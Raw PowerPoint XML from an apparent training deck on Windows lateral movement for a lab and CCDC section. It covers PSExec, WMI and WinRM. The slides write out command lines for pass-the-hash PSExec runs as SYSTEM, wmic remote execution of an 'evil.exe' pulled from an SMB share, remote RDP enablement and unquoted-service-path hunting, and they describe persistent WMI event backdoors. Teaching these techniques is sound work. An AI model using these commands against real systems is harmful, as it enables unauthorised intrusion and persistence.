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2" r:id="rId4"/>
    <p:sldId id="263" r:id="rId5"/>
    <p:sldId id="286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7" r:id="rId18"/>
    <p:sldId id="278" r:id="rId19"/>
    <p:sldId id="287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9C10D6-38B4-4737-BF1F-C0A10D508BF7}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="259"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Terraform" id="{EACDDC01-5045-4496-B573-EA7B03383EAF}">
          <p14:sldIdLst>
            <p14:sldId id="262"/>
            <p14:sldId id="263"/>
            <p14:sldId id="286"/>
            <p14:sldId id="260"/>
            <p14:sldId id="261"/>
            <p14:sldId id="264"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Protocols" id="{46B42179-ECAD-4651-86D4-6D7CE040F021}">
          <p14:sldIdLst>
            <p14:sldId id="265"/>
            <p14:sldId id="266"/>
            <p14:sldId id="267"/>
            <p14:sldId id="268"/>
            <p14:sldId id="269"/>
            <p14:sldId id="270"/>
            <p14:sldId id="272"/>
            <p14:sldId id="274"/>
            <p14:sldId id="277"/>
            <p14:sldId id="278"/>
            <p14:sldId id="287"/>
            <p14:sldId id="275"/>
            <p14:sldId id="276"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="CCDC" id="{EDD2BDD1-5F88-416F-B125-FFFD1AC51AD4}">
          <p14:sldIdLst>
            <p14:sldId id="280"/>
            <p14:sldId id="281"/>
            <p14:sldId id="282"/>
            <p14:sldId id="283"/>
            <p14:sldId id="284"/>
            <p14:sldId id="28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78ABE3C1-DBE1-495D-B57B-2849774B866A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446C117F-5CCF-4837-BE5F-2B92066CAFA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9D6E9DEC-419B-4CC5-A080-3B06BD5A8291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361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9D6E9DEC-419B-4CC5-A080-3B06BD5A8291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1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9D6E9DEC-419B-4CC5-A080-3B06BD5A8291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26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9D6E9DEC-419B-4CC5-A080-3B06BD5A8291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94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9D6E9DEC-419B-4CC5-A080-3B06BD5A8291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856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1FA3F48C-C7C6-4055-9F49-3777875E72AE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9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6178E61D-D431-422C-9764-11DAFE33AB63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4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8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02229"/>
            <a:ext cx="9905998" cy="456360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1827" y="6065837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30578ACC-22D6-47C1-A373-4FD133E34F3C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4E5A6C69-6797-4E8A-BF37-F2C3751466E9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0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D82014A1-A632-4878-A0D3-F52BA7563730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4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CE99F462-093F-4566-844B-4C71F2739DA5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6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3D24A7AC-904D-4781-85BA-7D10C17ED021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5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E331444B-B92B-4E27-8C94-BB93EAF5CB18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</p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{363EFA5E-FA76-400D-B3DC-F0BA90E6D107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76103"/>
            <a:ext cx="9905998" cy="4589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1827" y="606583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1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sysinternals.com/files/PSTools.zip" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/psexe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[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monexploits.com/unquoted-service-path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winrm/ws-management-protoco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docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoo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hashicorp.com/terraform/getting-started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vpn.net/community-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5DAA-6AD3-4A05-B10D-DF6886292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 on Lab:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Migrating Through a Windows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B477-E61C-4772-8713-2000438E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0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D1BD8-B93F-43DF-BCF2-A7609C06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B45AB-6D00-43DF-9D87-F31A6DFB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PSExec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More a technique than a protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WMI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Management Instrumentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deep Integration into Windows Internals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not Firewall Friendly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/RS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Remote Management / Windows remote Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Much more User and Firewall Friendly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leverages WMI for many tasks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286346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BBEF-00FA-4E44-AFA3-AB7656EF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PSExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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8BF1-4AC6-47CA-BD66-C39B670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written in 1996 by Mark Russinovich at a company named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SysInternals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft bought </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SysInternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in 2006 and began distributing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>utitlities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common, but not installed by default.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download from: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sysinternals/downloads/psexec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Direct Link: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://download.sysinternals.com/files/PSTools.zip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SMB Service Running (Port 139)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File and Print Sharing Enabled (but Simple File Sharing disabled)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Admin$ share accessible (default configuration)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credentials with permission to write to Admin$</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70567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64E2-9461-4B90-9F55-AEFC7AD6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PSExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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96D8-44F0-40F4-BD9E-E4B3C5F1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PSExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> copies a service (code built in to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PSExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) to the ADMIN$ share.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API and enable this service.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PSExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> service then creates a named pipe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The command to be executed is sent via the named pipe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On completion the service is stopped, removed, and deleted.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8271-DD29-431C-AA55-A18FDAFB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F372-5B2F-4A44-98E8-C8682D03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  <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>accepteula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\\[IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] [command]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credential Flags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-u domain\user -p password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-u domain\user -p &lt;LM&gt;:&lt;NTLM&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-s = run as system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command Formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cmd.exe \c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> C:\Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-c -f \\[ip]\share\file.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256588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0623-F464-465B-A840-39751A00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CD2D-8FF5-40F2-B5E3-EAD32D5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SysInternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PSExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> client are not installed by default on Windows machines (though they are built in to many hacking tools).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To install and run via PowerShell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Invoke-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WebRequest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-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uri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https://download.sysinternals.com/files/PSTools.zip -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outfile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tools.zip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Add-Type -A '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System.IO.Compression.FileSystem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'; [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IO.Compression.ZipFile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]::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ExtractToDirectory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('tools.zip', '.\');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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.\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psexec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/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accepteula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\\10.1.0.10 -u [User] -p [Password] 'ipconfig'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3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BBEF-00FA-4E44-AFA3-AB7656EF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8BF1-4AC6-47CA-BD66-C39B670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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“infrastructure for management data and operations on Windows-based operating systems”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used to support other methods (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Systems Center Operations Manager)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Included with all Windows versions since Win2k</a:t>
            </a:r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Ports 135 (DCOM), 445, 1024-1034 (configurable)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Valid Credentials (Local Admin to make any changes)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76190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8271-DD29-431C-AA55-A18FDAFB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F372-5B2F-4A44-98E8-C8682D03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Running Processes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wmic process list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List installed patches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wmic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qfe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remotely Execute Program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wmic /node:[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] /user:[domain]\[user] /password:[pass] process call create "\\[smb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]\share\evil.exe"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remotely start RDP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wmic /node:[machine name] path Win32_TerminalServiceSetting where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AllowTSConnections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="0" call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SetAllowTSConnections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "1"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>Search for unquoted service paths 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wmic service get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name,displayname,pathname,startmode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> |</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>findstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /I "auto" |</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>findstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /I /v "C:\windows\\" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>findstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /I /v """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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.commonexploits.com/unquoted-service-paths/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr 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4879-5A77-4EBC-8928-4587E5FD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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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6001-177F-4D9F-876D-024E2732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network share</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wmic share call create "", "Description", "[max Cons]", "SHARENAME", "", "C:\PATH", 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Note: First parameter is permissions object. Defaults to global read.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="250937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4E45-8ED4-44D2-8DE5-B04F6DF7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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Eventing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DBFA-E55D-45ED-AA24-74CB4DD2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WMI has the ability to trigger scripts based on an event (almost any event).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Three 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</a:rPr>
              <a:t>Filter–An action to trigger off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</a:rPr>
              <a:t>Consumer–An action to take upon triggering the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</a:rPr>
              <a:t>Binding–Registers a Filter to Consumer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Local events run for the lifetime of the host process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Permanent WMI events are persistent and run as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9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2D54-6033-4CCF-B6BC-796670DD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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Eventing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F222-900F-4F6B-AD35-FC12660F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98C5-4839-4A31-AB1B-AB028304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B304-80FE-443D-A6AC-F5F9C1FD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Setup via Terraform and AWS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objectives During Domain Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overview of Windows Remote Management Protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful Native Windows Commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools For Hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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BBEF-00FA-4E44-AFA3-AB7656EF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WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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8BF1-4AC6-47CA-BD66-C39B670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"Windows Remote Management (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) is the Microsoft implementation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>WS-Management Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems, from different vendors, to interoperate."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infrastructure for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WinRS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Windows Remote Shell, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2.0 Remoting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Depends on WMI locally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Remote Shell (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WinRS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user-friendly command line tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Included in Win7, Win8, Server 2008, Server 2012.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Installable on XP, Vista, Server 2003, and Windows 10</a:t>
            </a:r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Ports 5985 (HTTP), or 5986 (HTTPS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Valid Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298819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8271-DD29-431C-AA55-A18FDAFB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F372-5B2F-4A44-98E8-C8682D03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necessary firewall rules for the current user on the local machine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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>winrm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>quickconfig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) Enable-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PSRemoting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -Force</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute command on remote machine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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>winrs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -r:[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remote_sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] cmd.exe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(</a:t>
            </a:r>
            <a:r>
